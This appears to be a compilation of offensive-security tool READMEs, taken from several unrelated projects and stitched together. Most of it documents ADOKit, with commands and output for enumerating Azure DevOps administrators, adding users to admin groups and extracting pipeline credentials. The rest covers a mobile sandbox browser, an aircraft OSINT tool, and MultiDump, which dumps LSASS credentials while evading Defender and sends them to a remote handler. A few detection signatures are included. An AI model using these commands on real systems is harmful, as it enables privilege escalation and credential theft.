[TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management
[TestProject]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[TestProject2]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.
[ProjectWithMultipleRepos]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[MaraudersMap]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[YourOrganization]\Project Collection Build Administrators | Project Collection Build Administrators | Members of this group should include accounts for people who should be able to administer the build resources.
[TestProject]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
4/3/23 20:48:42 Finished execution of searchgroup
List all group members for a given group
Provide the getgroupmembers
module and the group(s) you would like to search for in the /group:
command-line argument, along with any relevant authentication information and URL. This will output the user principal name of each matching group, along with each member of that group, including the member's mail address and display name.
ADOKit.exe getgroupmembers /credential:apiKey /url:https://dev.azure.com/organizationName /group:"someGroup"
ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /group:"someGroup"
C:\>ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /group:"admin"
==================================================
Module: getgroupmembers
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 9:11:03 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject2]\Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1
[TestProject2]\Build Administrators | user2@YourOrganization.onmicrosoft.com | User 2
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
[MaraudersMap]\Project Administrators | rsmith@YourOrganization.onmicrosoft.com | Ron Smith
[TestProject2]\Project Administrators | user1@YourOrganization.onmicrosoft.com | User 1
[TestProject2]\Project Administrators | user2@YourOrganization.onmicrosoft.com | User 2
[YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
[ProjectWithMultipleRepos]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
[MaraudersMap]\Build Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
4/4/23 13:11:09 Finished execution of getgroupmembers
Get a listing of who has permissions to a given project.
Provide the getpermissions
module and the project you would like to search for in the /project:
command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for each matching group. Additionally, this will output the group members for each of those groups.
ADOKit.exe getpermissions /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someproject"
ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someproject"
C:\>ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"
==================================================
Module: getpermissions
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 9:11:16 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
UPN | Display Name | Description
------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
[MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[MaraudersMap]\Project Valid Users | Project Valid Users | Members of this group have access to the team project.
[MaraudersMap]\Readers | Readers | Members of this group have access to the team project.
[*] INFO: Listing group members for each group that has permissions to this project
GROUP NAME: [MaraudersMap]\Build Administrators
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
GROUP NAME: [MaraudersMap]\Contributors
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Contributors | user1@YourOrganization.onmicrosoft.com | User 1
[MaraudersMap]\Contributors | user2@YourOrganization.onmicrosoft.com | User 2
GROUP NAME: [MaraudersMap]\MaraudersMap Team
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\MaraudersMap Team | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
GROUP NAME: [MaraudersMap]\Project Administrators
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
GROUP NAME: [MaraudersMap]\Project Valid Users
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
GROUP NAME: [MaraudersMap]\Readers
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Readers | jsmith@YourOrganization.onmicrosoft.com | John Smith
4/4/23 13:11:18 Finished execution of getpermissions
Add a user to the Project Administrators group for a given project.
Provide the addprojectadmin
module along with a /project:
and /user:
for a given user to be added to the Project Administrators
group for the given project. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe addprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
C:\>ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"
==================================================
Module: addprojectadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 2:52:45 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Administrators group for the maraudersmap project.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
[MaraudersMap]\Project Administrators | user1@YourOrganization.onmicrosoft.com | User 1
4/4/23 18:52:47 Finished execution of addprojectadmin
Remove a user from the Project Administrators group for a given project.
Provide the removeprojectadmin
module along with a /project:
and /user:
for a given user to be removed from the Project Administrators
group for the given project. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe removeprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
C:\>ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"
==================================================
Module: removeprojectadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 3:19:43 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Administrators group for the maraudersmap project.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | brett.hawkins@YourOrganization.onmicrosoft.com | Brett Hawkins
4/4/23 19:19:44 Finished execution of removeprojectadmin
Add a user to the Build Administrators group for a given project.
Provide the addbuildadmin
module along with a /project:
and /user:
for a given user to be added to the Build Administrators
group for the given project. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe addbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
C:\>ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"
==================================================
Module: addbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 3:41:51 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Build Administrators group for the maraudersmap project.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1
4/4/23 19:41:55 Finished execution of addbuildadmin
Remove a user from the Build Administrators group for a given project.
Provide the removebuildadmin module along with a /project: and /user: for a given user to be removed from the Build Administrators group for the given project. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe removebuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"
C:\>ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"
==================================================
Module: removebuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 3:42:10 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Build Administrators group for the maraudersmap project.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------
4/4/23 19:42:11 Finished execution of removebuildadmin
Add a user to the Project Collection Administrators group.
Provide the addcollectionadmin module along with a /user: for a given user to be added to the Project Collection Administrators group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe addcollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: addcollectionadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 4:04:40 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Collection Administrators group.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
-------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------------
[YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
[YourOrganization]\Project Collection Administrators | user1@YourOrganization.onmicrosoft.com | User 1
4/4/23 20:04:43 Finished execution of addcollectionadmin
Remove a user from the Project Collection Administrators group.
Provide the removecollectionadmin module along with a /user: for a given user to be removed from the Project Collection Administrators group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe removecollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: removecollectionadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 4:10:35 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Collection Administrators group.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------
[YourOrganization]\Project Collection Administrators | jsmith@YourOrganization.onmicrosoft.com | John Smith
4/4/23 20:10:38 Finished execution of removecollectionadmin
Add a user to the Project Collection Build Administrators group.
Provide the addcollectionbuildadmin module along with a /user: for a given user to be added to the Project Collection Build Administrators group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe addcollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: addcollectionbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 8:21:39 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Collection Build Administrators group.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
---------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------
[YourOrganization]\Project Collection Build Administrators | user1@YourOrganization.onmicrosoft.com | User 1
4/5/23 12:21:42 Finished execution of addcollectionbuildadmin
Remove a user from the Project Collection Build Administrators group.
Provide the removecollectionbuildadmin module along with a /user: for a given user to be removed from the Project Collection Build Administrators group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe removecollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: removecollectionbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 8:21:59 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Collection Build Administrators group.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
--------------------------------------------------------------------------------- -----------------------------------------------------------------------------------------------
4/5/23 12:22:02 Finished execution of removecollectionbuildadmin
Add a user to the Project Collection Build Service Accounts group.
Provide the addcollectionbuildsvc module along with a /user: for a given user to be added to the Project Collection Build Service Accounts group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe addcollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: addcollectionbuildsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 8:22:13 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Collection Build Service Accounts group.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
------------------------------------------------------------------------------------------------ --------------------------------------------------------------------------------
[YourOrganization]\Project Collection Build Service Accounts | user1@YourOrganization.onmicrosoft.com | User 1
4/5/23 12:22:15 Finished execution of addcollectionbuildsvc
Remove a user from the Project Collection Build Service Accounts group.
Provide the removecollectionbuildsvc module along with a /user: for a given user to be removed from the Project Collection Build Service Accounts group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe removecollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: removecollectionbuildsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 8:22:27 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Collection Build Service Accounts group.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
----------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------
4/5/23 12:22:28 Finished execution of removecollectionbuildsvc
Add a user to the Project Collection Service Accounts group.
Provide the addcollectionsvc module along with a /user: for a given user to be added to the Project Collection Service Accounts group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe addcollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: addcollectionsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 11:21:01 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to add user1 to the Project Collection Service Accounts group.
[+] SUCCESS: User successfully added
Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------- -----------------------------------------------------------------
[YourOrganization]\Project Collection Service Accounts | jsmith@YourOrganization.onmicrosoft.com | John Smith
[YourOrganization]\Project Collection Service Accounts | user1@YourOrganization.onmicrosoft.com | User 1
4/5/23 15:21:04 Finished execution of addcollectionsvc
Remove a user from the Project Collection Service Accounts group.
Provide the removecollectionsvc module along with a /user: for a given user to be removed from the Project Collection Service Accounts group. Additionally, provide any relevant authentication information and URL. See the Module Details Table for the permissions needed to perform this action.
ADOKit.exe removecollectionsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"
ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"
C:\>ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"
==================================================
Module: removecollectionsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/5/2023 11:21:43 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Attempting to remove user1 from the Project Collection Service Accounts group.
[+] SUCCESS: User successfully removed
Group | Mail Address | Display Name
-------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------
[YourOrganization]\Project Collection Service Accounts | jsmith@YourOrganization.onmicrosoft.com | John Smith
4/5/23 15:21:44 Finished execution of removecollectionsvc
Extract any pipeline variables being used in project(s), which could contain credentials or other useful information.
Provide the getpipelinevars module along with a /project: for a given project to extract any pipeline variables being used. If you would like to extract pipeline variables from all projects, specify all in the /project: argument.
ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getpipelinevars /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"
ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"
C:\>ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"
==================================================
Module: getpipelinevars
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/6/2023 12:08:35 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Pipeline Var Name | Pipeline Var Value
-----------------------------------------------------------------------------------
credential | P@ssw0rd123!
url | http://blah/
4/6/23 16:08:36 Finished execution of getpipelinevars
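For scripting around the same data, pipeline variables can also be read directly from the documented Azure DevOps REST API, since build definitions expose a variables property. Below is a minimal Python sketch under that assumption; the organization, project, and PAT values are placeholders:

import requests

ORG, PROJECT, PAT = "organizationName", "someProject", "apiKey"  # placeholders
base = f"https://dev.azure.com/{ORG}/{PROJECT}/_apis/build/definitions"
params = {"api-version": "7.1"}

# List build (pipeline) definitions, then fetch each one in full to read its variables.
defs = requests.get(base, auth=("", PAT), params=params).json()
for d in defs.get("value", []):
    full = requests.get(f"{base}/{d['id']}", auth=("", PAT), params=params).json()
    for name, var in (full.get("variables") or {}).items():
        # Secret variables are returned without a value; plaintext ones include it.
        print(f"{name} = {var.get('value', '[HIDDEN]')}")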
Extract the names of any pipeline secrets being used in project(s), which will direct the operator where to attempt to perform secret extraction.
Provide the getpipelinesecrets module along with a /project: for a given project to extract the names of any pipeline secrets being used. If you would like to extract the names of pipeline secrets from all projects, specify all in the /project: argument.
ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getpipelinesecrets /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"
ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"
C:\>ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"
==================================================
Module: getpipelinesecrets
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/10/2023 10:28:37 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Build Secret Name | Build Secret Value
-----------------------------------------------------
anotherSecretPass | [HIDDEN]
secretpass | [HIDDEN]
4/10/23 14:28:38 Finished execution of getpipelinesecrets
List any service connections being used in project(s), which will direct the operator where to attempt to perform credential extraction for any service connections being used.
Provide the getserviceconnections module along with a /project: for a given project to list any service connections being used. If you would like to list service connections used across all projects, specify all in the /project: argument.
ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getserviceconnections /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"
ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all"
C:\>ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"
==================================================
Module: getserviceconnections
Auth Type: Cookie
Project: maraudersmap
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/11/2023 8:34:16 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Connection Name | Connection Type | ID
--------------------------------------------------------------------------------------------------------------------------------------------------
Test Connection Name | generic | 195d960c-742b-4a22-a1f2-abd2c8c9b228
Not Real Connection | generic | cd74557e-2797-498f-9a13-6df692c22cac
Azure subscription 1(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | 5665ed5f-3575-4703-a94d-00681fdffb04
Azure subscription 1(1)(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | df8c023b-b5ad-4925-a53d-bb29f032c382
4/11/23 12:34:16 Finished execution of getserviceconnections
Below are static signatures for the specific usage of this tool in its default state:
{60BC266D-1ED5-4AB5-B0DD-E1001C3B1498}
ADOKit-21e233d4334f9703d1a3a42b6e2efd38
ADOKitUsage.json - Detects the usage of ADOKit with any auditable event (e.g., adding a user to a group)
PersistenceTechniqueWithADOKit.json - Detects the creation of a PAT or SSH key with ADOKit
For detection guidance of the techniques used by the tool, see the X-Force Red whitepaper.
https://learn.microsoft.com/en-us/rest/api/azure/devops/?view=azure-devops-rest-7.1
https://learn.microsoft.com/en-us/azure/devops/user-guide/what-is-azure-devops?view=azure-devops
Noia is a web-based tool whose main aim is to ease the process of browsing mobile applications sandbox and directly previewing SQLite databases, images, and more. Powered by frida.re.
Please note that I'm not a programmer, but I'm probably above the median in code-savviness. Try it out, open an issue if you find any problems. PRs are welcome.
Explore third-party applications files and directories. Noia shows you details including the access permissions, file type and much more.
View custom binary files. Directly preview SQLite databases, images, and more.
Search application by name.
Search files and directories by name.
Navigate to a custom directory using the ctrl+g shortcut.
Download the application files and directories for further analysis.
Basic iOS support
and more
Noia is available on npm, so just type the following command to install it and run it:
npm install -g noia
noia
Noia is powered by frida.re, thus requires Frida to run.
See: * https://frida.re/docs/android/ * https://frida.re/docs/ios/
Security Warning
This tool is not secure and may include some security vulnerabilities so make sure to isolate the webpage from potential hackers.
MIT
skytrack is a command-line based plane spotting and aircraft OSINT reconnaissance tool made using Python. It can gather aircraft information using various data sources, generate a PDF report for a specified aircraft, and convert between ICAO and Tail Number designations. Whether you are a hobbyist plane spotter or an experienced aircraft analyst, skytrack can help you identify and enumerate aircraft for general-purpose reconnaissance.
Planespotting is the art of tracking down and observing aircraft. While planespotting mostly consists of photography and videography of aircraft, aircraft information gathering and OSINT is a crucial step in the planespotting process. OSINT (Open Source Intelligence) describes a methodology of using publicly accessible data sources to obtain data about a specific subject: in this case, planes!
To run skytrack on your machine, follow the steps below:
$ git clone https://github.com/ANG13T/skytrack
$ cd skytrack
$ pip install -r requirements.txt
$ python skytrack.py
skytrack works best for Python version 3.
skytrack features three main functions for aircraft information gathering and display options. They include the following:
skytrack obtains general information about the aircraft given its tail number or ICAO designator. The tool sources this information using several reliable data sets. Once the data is collected, it is displayed in the terminal within a table layout.
skytrack also enables you to save the collected aircraft information into a PDF. The PDF includes all the aircraft data in a visual layout for later reference. The PDF report will be entitled "skytrack_report.pdf".
There are two standard identification formats for specifying aircraft: Tail Number and ICAO Designation. The tail number (aka N-Number) is an alphanumeric ID starting with the letter "N" used to identify aircraft. The ICAO designation is a six-character fixed-length ID in hexadecimal format. Both standards are highly pertinent for aircraft reconnaissance, as both can be used to search for a specific aircraft in data sources. However, converting them from one format to another can be rather cumbersome as it follows a tricky algorithm. To streamline this process, skytrack includes a standard converter.
ICAO and Tail Numbers follow a mapping system like the following:
ICAO address N-Number (Tail Number)
a00001 N1
a00002 N1A
a00003 N1AA
You can learn more about aircraft registration numbers [here](https://www.faa.gov/licenses_certificates/aircraft_certification/aircraft_registry/special_nnumbers).
Warning: The converter only works for USA-registered aircraft.
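To make the mapping concrete, here is a minimal Python sketch (not skytrack's code) that checks whether an ICAO address falls in the US block and computes its sequential index; the range bounds 0xA00001 (N1) through 0xADF7C7 (N99999) are assumptions based on the published FAA allocation:

def us_icao_index(icao_hex: str) -> int:
    """Return the 1-based sequential index of a US ICAO address (a00001 -> 1 -> N1)."""
    code = int(icao_hex, 16)
    if not 0xA00001 <= code <= 0xADF7C7:  # assumed US N-number block
        raise ValueError("not a US-registered ICAO address")
    return code - 0xA00000

print(us_icao_index("a00001"))  # 1, maps to N1
print(us_icao_index("a00003"))  # 3, maps to N1AA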
ICAO Aircraft Type Designators Listings
skytrack is open to any contributions. Please fork the repository and make a pull request with the features or fixes you want to implement.
If you enjoyed skytrack, please consider becoming a sponsor or donating on buymeacoffee in order to fund my future projects.
To check out my other works, visit my GitHub profile.
MultiDump is a post-exploitation tool written in C for dumping and extracting LSASS memory discreetly, without triggering Defender alerts, with a handler written in Python.
Blog post: https://xre0us.io/posts/multidump
MultiDump supports LSASS dumps via ProcDump.exe or comsvcs.dll. It offers two modes: a local mode that encrypts and stores the dump file locally, and a remote mode that sends the dump to a handler for decryption and analysis.
__ __ _ _ _ _____
| \/ |_ _| | |_(_) __ \ _ _ _ __ ___ _ __
| |\/| | | | | | __| | | | | | | | '_ ` _ \| '_ \
| | | | |_| | | |_| | |__| | |_| | | | | | | |_) |
|_| |_|\__,_|_|\__|_|_____/ \__,_|_| |_| |_| .__/
|_|
Usage: MultiDump.exe [-p <ProcDumpPath>] [-l <LocalDumpPath> | -r <RemoteHandlerAddr>] [--procdump] [-v]
-p Path to save procdump.exe, use full path. Default to temp directory
-l Path to save encrypted dump file, use full path. Default to current directory
-r Set ip:port to connect to a remote handler
--procdump Writes procdump to disk and uses it to dump LSASS
--nodump Disable LSASS dumping
--reg Dump SAM, SECURITY and SYSTEM hives
--delay Increase the interval between connections for slower network speeds
-v Enable verbose mode
MultiDump defaults to local mode using comsvcs.dll and saves the encrypted dump in the current directory.
Examples:
MultiDump.exe -l C:\Users\Public\lsass.dmp -v
MultiDump.exe --procdump -p C:\Tools\procdump.exe -r 192.168.1.100:5000
usage: MultiDumpHandler.py [-h] [-r REMOTE] [-l LOCAL] [--sam SAM] [--security SECURITY] [--system SYSTEM] [-k KEY] [--override-ip OVERRIDE_IP]
Handler for RemoteProcDump
options:
-h, --help show this help message and exit
-r REMOTE, --remote REMOTE
Port to receive remote dump file
-l LOCAL, --local LOCAL
Local dump file, key needed to decrypt
--sam SAM Local SAM save, key needed to decrypt
--security SECURITY Local SECURITY save, key needed to decrypt
--system SYSTEM Local SYSTEM save, key needed to decrypt
-k KEY, --key KEY Key to decrypt local file
--override-ip OVERRIDE_IP
Manually specify the IP address for key generation in remote mode, for proxied connection
As with all LSASS related tools, Administrator/SeDebugPrivilege privileges are required.
